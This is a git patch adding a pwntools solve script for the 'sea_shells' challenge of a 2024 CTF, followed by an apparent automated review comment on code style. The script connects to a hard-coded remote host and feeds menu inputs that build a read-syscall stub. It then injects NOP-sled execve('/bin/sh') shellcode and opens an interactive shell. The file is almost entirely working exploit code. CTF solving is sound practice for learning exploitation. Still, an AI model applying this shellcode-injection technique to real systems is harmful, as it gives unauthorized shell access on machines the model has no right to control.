From 031201a421c692741ecaf2e396594588da8e109c Mon Sep 17 00:00:00 2001
From: jc
Date: Mon, 18 Nov 2024 19:52:31 +0300
Subject: [PATCH] solve script
---
 p3rf3ctr00t_ctf_2024/sea_shells/a.py | 65 ++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 p3rf3ctr00t_ctf_2024/sea_shells/a.py
diff --git a/p3rf3ctr00t_ctf_2024/sea_shells/a.py b/p3rf3ctr00t_ctf_2024/sea_shells/a.py
new file mode 100644
index 0000000..008d6a5
--- /dev/null
+++ b/p3rf3ctr00t_ctf_2024/sea_shells/a.py
@@ -0,0 +1,65 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./challenge", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1243)
+
+# funcs
+s = lambda a: r.sendline(a)
+inc = lambda: r.sendline(b"2")
+
+# read
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+s(b"4")
+s(b"3")
+s(b"5") # 89
+inc()
+for i in range(2): s(b"4")
+for i in range(2): s(b"3")
+for i in range(5): s(b"6")
+s(b"5") # d6
+inc()
+for i in range(3): s(b"3")
+s(b"5")
+s(b"6") # 48
+inc()
+for i in range(4): s(b"3")
+for i in range(6): s(b"6")
+s(b"5") # 31
+inc()
+for i in range(2): s(b"4")
+for i in range(3): s(b"6")
+s(b"3")
+s(b"5") # d2
+inc()
+for i in range(2): s(b"4")
+for i in range(9): s(b"6")
+for i in range(2): s(b"3")
+s(b"5") # b2
+inc()
+for i in range(17): s(b"5") # ff
+inc()
+s(b"5") # 0f
+inc()
+for i in range(2): s(b"3")
+s(b"5")
+for i in range(6): s(b"6") # 05
+s(b"7")
+
+# execve
+sc = """
+lea rdi, [rsi+35]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
+s(sc)
+
+r.interactive()
\ No newline at end of file
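Review bot: The menu-option sequences under `# read` are commented only with the byte each group produces (`# 48`, `# 89`, …) and not with what options 2–7 mean in the challenge menu, so the encoding cannot be checked or re-derived from the script alone; a one-line comment above the first loop of the form `# menu options: 2=<...>, 3=<...>, 4=<...>, 5=<...>, 6=<...>, 7=<...>` (meanings filled in from the challenge) would make the sequence reviewable. The target is fixed by `r = remote("94.72.112.248", 1243)` with the local `# r = process()` line commented out, so re-running against a local build of `./challenge` means editing the file; the usual pwntools form is `r = remote("94.72.112.248", 1243) if args.REMOTE else process()`. The loop index `i` is never used in any of the `for` loops and would conventionally be `_`, and the file ends without a trailing newline.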